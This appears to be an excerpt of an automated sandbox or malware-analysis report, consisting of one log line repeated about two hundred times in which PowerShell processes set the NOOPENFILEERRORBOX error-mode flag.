                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
